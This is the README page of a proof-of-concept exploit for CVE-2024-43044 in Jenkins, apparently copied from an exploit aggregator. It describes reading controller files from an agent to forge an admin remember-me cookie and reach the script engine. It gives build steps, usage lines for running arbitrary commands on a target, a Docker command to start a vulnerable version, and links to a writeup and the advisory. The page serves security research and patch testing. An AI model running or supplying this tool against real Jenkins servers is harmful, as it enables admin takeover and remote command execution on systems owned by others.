## https://sploitus.com/exploit?id=0F87E49C-425D-52E8-8B66-49ACBBA1B98F
## Intro
This is an exploit for CVE-2024-43044, an arbitrary file read that allows an agent to fetch files from the controller.
The exploit will use the vulnerability to read files to forge a remember-me cookie for an admin account and gain access to
Jenkins scripting engine.
Check out the full writeup at https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
## Building the exploit
```
mvn package
```
## Running the exploit
```
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
```
## Testing
You can test it in vulnerable version using docker:
```
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
```
Once you have a jenkins runnning, setup an agent.
The controller/agent connection can be either default (using url, nodename, secret) or via SSH.
## Demonstration
![RCE](./assets/rce_mode_secret.gif).
## References
https://www.jenkins.io/security/advisory/2024-08-07/